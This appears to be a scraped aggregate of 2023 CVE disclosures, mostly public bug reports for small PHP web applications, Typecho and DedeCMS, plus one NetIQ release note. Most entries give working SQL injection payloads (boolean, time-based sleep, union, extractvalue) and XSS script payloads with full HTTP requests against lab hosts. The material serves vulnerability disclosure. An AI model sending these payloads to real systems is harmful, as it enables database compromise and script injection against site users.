A vulnerability classified as critical was found in SourceCodester Automatic Question Paper Generator System 1.0. This vulnerability affects unknown code of the file users/question_papers/manage_question_paper.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223336.

BUG\_Author:0019FF

Vulnerability File: /aqpg/users/question\_papers/manage\_question\_paper.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and 999=999 and 'o'='o

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20999=999%20and%20%27o%27=%27o HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The sql statement is executed correctly

Payload2:id=1' and 999=996 and 'o'='p

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20999=996%20and%20%27o%27=%27p HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The sql statement was executed incorrectly, causing the page not to be echoed normally

Payload3:id=1' and (select 9 from (select(sleep(15)))b) and 't'='t

    GET /aqpg/users/question_papers/manage_question_paper.php?id=1%27%20and%20(select%209%20from%20(select(sleep(15)))b)%20and%20%27t%27=%27t HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=gqm4opdrfvm9njhrtmcivvn20b
    Connection: close
    

The server response time is 15 seconds

CVE-2023-1474: bug_report/SQLi.md at main · 19FF/bug_report

A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracker System 1.0. This issue affects some unknown processing of the file medicines/view_details.php of the component GET Parameter Handler. The manipulation of the argument GET leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223283.

BUG\_Author:godgua

Vulnerability File: /php-mts/app/medicines/view\_details.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=-1' union all select null,null,null,concat(0x51525354,0x41424344,0x61626364),null,null-- -

    GET /php-mts/app/medicines/view_details.php?id=-1%27%20union%20all%20select%20null,null,null,concat(0x51525354,0x41424344,0x61626364),null,null--%20- HTTP/1.1
    Host: 192.168.0.100
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=t194o00fbqgbautftistta6ap2
    Connection: close
    

union query success

Payload2:id=1' and (select 2 from (select(sleep(15)))a) AND 'c'='c

    GET /php-mts/app/medicines/view_details.php?id=1%27%20and%20(select%202%20from%20(select(sleep(15)))a)%20AND%20%27c%27=%27c HTTP/1.1
    Host: 192.168.0.100
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=t194o00fbqgbautftistta6ap2
    Connection: close
    

The server's response time is 15 seconds

CVE-2023-1439: bug_report/SQLi-1.md at main · GodGua/bug_report

School Registration and Fee System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at/bilal final/edit_user.php.

Permalink

Cannot retrieve contributors at this time

**School Registration and Fee System v1.0 has SQL injection**

BUG\_Author:Forsan

Vulnerability File: /bilal final/edit\_user.php

GET parameter 'id' exists SQL injection vulnerability

Payload1: http://localhost/bilal%20final/edit\_user.php?id=3%27

    GET /bilal%20final/edit_user.php?id=3%27 HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

An error occurred in the sql statement

Payload2: http://localhost/bilal%20final/edit\_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b

    GET /bilal%20final/edit_user.php?id=3%27%20and%20(select%204%20from%20(select(sleep(5)))a)--%20b HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=1n5lla2368pm1f9736l2bfp58a
    Connection: close
    

The server's response time is 5 seconds

CVE-2023-27041: bug_report/SQLi-1.md at main · forsean/bug_report

Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via the Comment Manager /admin/manage-comments.php component.

**Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability****Influenced Version**

Typecho <= 1.2.0

**Description**

Typecho admin backend comment manager with refleted-XSS vulnerability..

1.  Login to admin backend management system.
2.  In Comment Manager /admin/manage-comments.php, the unfiltered request parameter cid is directly echoed to html.

**POC**

POST /admin/manage-comments.php with:

    coid[]=1&cid="><script>alert(1)</script><!--
    

The full POC request:

POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&\_\_typecho\_all\_posts=off&uid= HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 745020ecd4b17dde48d43755702a78b4\_\_typecho\_uid=1; 745020ecd4b17dde48d43755702a78b4\_\_typecho\_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD\_2132\_saltkey=ql9191Ym; u5DD\_2132\_lastvisit=1677486351; u5DD\_2132\_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD\_2132\_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD\_2132\_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD\_2132\_lastcheckfeed=1%7C1677489964; u5DD\_2132\_nofavfid=1; u5DD\_2132\_home\_diymode=1; u5DD\_2132\_visitedfid=2; u5DD\_2132\_smile=1D1; u5DD\_2132\_home\_readfeed=1677497943; u5DD\_2132\_forum\_lastvisit=D\_2\_1677498054; u5DD\_2132\_st\_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD\_2132\_editormode\_e=1; u5DD\_2132\_st\_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD\_2132\_viewid=tid\_1; u5DD\_2132\_seccode=5.792e3c6d8b004d4403; u5DD\_2132\_seccodecSE52ETX=6.a73b7daa353701b59a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

coid\[\]=1&cid="><script>alert(1)</script><!--

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27711: Typecho <= 1.2.0 Comment Manager with Refleted-XSS Vulnerability · Issue #1539 · typecho/typecho

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dedestory_catalog.php endpoint.

**Description**

Admin backend story catalog blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/story_catalog.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  Requires PHP ≤ 5 and MySQL ≤ 5.5, and the story component contains at least one record in database.
4.  In the source code of /dede/story_catalog.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

POST /cms/dedecms/dede/story\_catalog.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fstory\_books.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27709: DedeCMS V5.7.160 Backend Blind SQL Injection

SQL injection vulnerability found in DedeCMS v.5.7.106 allows a remote attacker to execute arbitrary code via the rank_* parameter in the /dede/group_store.php endpoint.

**Description**

Admin backend group store blind SQL injection via post parameters.

**Affected Version**

DedeCMS <= 5.7.160

**POC**

1.  Login to admin backend management.
2.  Request to /dede/group_store.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
3.  In the source code of /dede/group_store.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.

Full POC request:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  

POST /cms/dedecms/dede/group\_store.php?action=uprank HTTP/1.1  
Host: 192.168.0.8  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: menuitems=1\_1%2C2\_1%2C3\_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; \_csrf\_name\_273c7533=e59946ea73ad488a9da6a03897480ac5; \_csrf\_name\_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV\_GOBACK\_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup\_store.php  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 29  
  
rank\_1\=1'+and+sleep(3)+and+'1  

**Reference**

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27707: DedeCMS V5.7.160 Backend Blind SQL Injection

Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via an arbitrarily supplied URL parameter.

**Typecho <= 1.2.0 Admin System with Reflected-XSS****Influenced Version**

Typecho <= 1.2.0

**Description**

Typecho admin backend management system with reflected-XSS in the name of an arbitrarily supplied URL parameter.

1.  Login to typecho admin backend management system, in "/admin/index.php", "admin/themes.php" or "/admin/backup.php".
2.  In the name of an arbitrarily supplied URL parameter, no matter key or value, will be injected to a html href attribute of <a> tag.

**POC**

    GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1
    Host: 192.168.0.10
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296
    Connection: close
    
    

/admin/index.php

/admin/theme.php

/admin/backup.php

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2023-27130: Typecho <= 1.2.0 Admin System with Reflected-XSS Vulnerability · Issue #1535 · typecho/typecho

Online Book Store Project v1.0 is vulnerable to SQL Injection via /bookstore/bookPerPub.php.

Permalink

**Online Book Store Project v1.0 by itsourcecode.com has SQL injection**

**Vul\_Author:** Wenxun Wang

**vendors:** https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/

**Vulnerability url:** /bookstore/bookPerPub.php?pubid=

**Vulnerability location:** /bookstore/bookPerPub.php

**\[+\] Payload:** /bookstore/bookPerPub.php?pubid=1'%20and%20(extractvalue('anything'%2cconcat('~'%2c(select%20database()))))%3b%23

​ Leak place : pubid

**Current database name:** bookstoredb

**Request package**：select book information by pubid

    GET /bookstore/bookPerPub.php?pubid=1'%20and%20(extractvalue('anything'%2cconcat('~'%2c(select%20database()))))%3b%23 HTTP/1.1
    Host: localhost
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/bookstore/publisher_list.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=8it4g868ibt9g6r8ae4203tmkd
    Connection: close
    

**SQL injection result**：line 12 database name is displayed.

CVE-2023-27250: bug_report/sql_injection.md at main · iknownt/bug_report

Broken access control in Advanced Authentication versions prior to 6.4.1.1 and 6.3.7.2

March 2023

Advanced Authentication 6.4 Service Pack 1 Patch 1 includes enhancements, and resolves several previous issues.

Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure that our products meet all your needs. You can post feedback in the Advanced Authentication forum on NetIQ Communities, our online community that also includes product information, blogs, and links to helpful resources. You can also post or vote for the ideas of enhancement requests in the Ideas forum.

For more information about this release and the latest release notes, see the NetIQ Advanced Authentication Documentation page.

If you have suggestions for documentation improvements, click at the bottom of the specific page in the HTML version of the documentation posted at the NetIQ Advanced Authentication Documentation page.

**1.0 What’s New?**

Advanced Authentication 6.4 Service Pack 1 Patch 1 provides the following:

*   Enhancements
    
*   Security Improvement
    

**1.1 Enhancements**

Advanced Authentication 6.4 Service Pack 1 Patch 1 includes the following enhancements:

*   FIDO2 Improvements
    
*   Ability to Add Twilio Subaccounts in the SMS Sender Policy
    
*   An Option to Allow Third-Party Service Providers to Select the Chain for Any Client
    

**FIDO2 Improvements**

The following enhancements have been added to the FIDO2 method:

*   Ability to Enroll Resident Credentials
    
    The administrator can allow users to enroll the FIDO2 method and store the Resident Credentials (security key) on the FIDO2-compliant device (YubiKey). With Resident Credentials, users can experience seamless login without specifying their username and password.
    
*   Username-less Login Support
    
    Advanced Authentication extends the FIDO2 method to support the username-less authentication to the Web Authentication events. The enrolled FIDO2 card contains the username. When the user taps the card, the username is filled in the respective field automatically. To configure the username-less authentication, three options have been introduced in the FIDO2 method.
    
*   Ability to Disable the PIN Prompt
    
    Advanced Authentication facilitates the administrator to mandate or hide the PIN prompt when users enroll, test and authenticate with the FIDO2 method.
    
    For more information, see FIDO2 in the Advanced Authentication - Administration guide.
    

**Ability to Add Twilio Subaccounts in the SMS Sender Policy**

This release provides ability to add the subaccounts of Twilio Parent account. With subaccounts, you can add Country Codes based on the customer’s (SMS receivers) geographic location. The subaccounts distinguish the usage based on team, customer or product, and provides clear billing data. Also, allows resource (phone number) mapping.

For more information, see SMS Sender in the Advanced Authentication - Administration guide.

**An Option to Allow Third-Party Service Providers to Select the Chain for Any Client**

This release introduces the option in the policy to allow the third-party service providers to select a preferred chain for any client, such as Windows Client, Mac OS X Client, and Linux PAM Client workstation. Then, route users to the selected chain during authentication.

For more information, see Enabling the Client Chain Selection in the Advanced Authentication - Administration guide.

**1.2 Security Improvement**

Advanced Authentication 6.4 Service Pack 1 Patch 1 release addresses CVE-2023-24468.

**2.0 Resolved Issues**

This release includes the following software fixes:

Component

Description

Administration

When a user sets to in the policy, then the list in the does not display all the available chains.

Administration

On the , enrollment of the U2F method fails on the following browser:

*   Google Chrome
    
*   Microsoft Edge
    
*   Mozilla Firefox
    

Administration

The option is modified to in the policy.

Administration

The option is modified to in the method.

Smartphone

When a user tries to authenticate with the method, a prompt to specify the PIN (User Verification) is not displayed on the Android devices.

Smartphone

When a user attempts to authenticate with the NetIQ Advanced Authentication iOS smartphone application by using the facial recognition, the application does not identify the face and prompts the user to re-authenticate. Users are experiencing infinite authentication loop.

Smartphone

When a user sets the option to in the NetIQ Advanced Authentication iOS smartphone application settings for face recognition authentication. Later, the user is unable to set the option to .

Smartphone

When a user sets the smartphone language to Arabic, the NetIQ Advanced Authentication iOS smartphone application stops working.

Windows Client

While connecting to the remote desktop on the Windows Client, the Advanced Authentication Credential Provider does not display the chains that require Device Service for the elevated access.

**3.0 Upgrading**

You can directly upgrade to Advanced Authentication 6.4 Service Pack 1 Patch 1 from 6.4.1.

_NOTE:_The following is the recommended upgrade sequence:

1.  Advanced Authentication servers
    
2.  Plug-ins
    
3.  Client components
    
    Any change in the upgrade sequence is not supported.
    

_NOTE:_The RAM requirements of Advanced Authentication have been changed in 6.4 as follows:

*   Minimum: 8 GB per server.
    
*   Recommended: 12 GB per server
    

Before upgrading your Advanced Authentication cluster to 6.4, ensure that the environment complies with the new requirements.

For more information, see Advanced Authentication System Requirements.

**4.0 Known Issue**

Advanced Authentication 6.4 Service Pack 1 Patch 1 does not have any known issue.

**5.0 Contact Information**

Our goal is to provide documentation that meets your needs. If you have suggestions for improvements, please email Documentation-Feedback@netiq.com. We value your input and look forward to hearing from you.

For detailed contact information, see the Support Contact Information website.

For general corporate and product information, see the NetIQ Corporate website.

For interactive conversations with your peers and NetIQ experts, become an active member of our community. The NetIQ online community provides product information, useful links to helpful resources, blogs, and social media channels.

**6.0 Legal Notice**

© Copyright 2023 Micro Focus or one of its affiliates.

The only warranties for products and services of Micro Focus and its affiliates and licensors (“Micro Focus”) are as may be set forth in the express warranty statements accompanying such products and services. Nothing herein should be construed as constituting an additional warranty. Micro Focus shall not be liable for technical or editorial errors or omissions contained herein. The information contained herein is subject to change without notice.

For additional information, such as certification-related notices and trademarks, see https://www.microfocus.com/en-us/legal.

CVE-2023-24468: Advanced Authentication 6.4 Service Pack 1 Patch 1 Release Notes

Cross site scripting (XSS) vulnerability in xenv S-mall-ssm thru commit 3d9e77f7d80289a30f67aaba1ae73e375d33ef71 on Feb 17, 2020, allows local attackers to execute arbitrary code via the evaluate button.

**How to reproduce steps(如何复现)**

Build the project and use admin/123456 to log in and create several test data(搭建项目使用admin/123456登陆创建几条测试数据)  
  
Create an ordinary user and click on a product we created to buy(创建一个普通用户随便点击一个我们创建的商品购买)  
For the convenience of testing, a free purchase function is provided. Click it(为了方便测试提供了一个免费购买的功能,)  
  
First, check my own order, then select the order we just purchased, click to ship by yourself, and finally click to confirm receipt(首先查看我自己的订单其次选择我们刚才购买的订单点击自己发货最后点击确认收货)  
  
Use the evaluation function,insert poc <script>alert("undefined123")</script> (使用评价功能,插入poc)  

**受影响的版本**

S-mall-ssm: lastest  
OS：Windows/Linux/macOS  
Browser: Chrome、Firefox、Safair

Tag

#chrome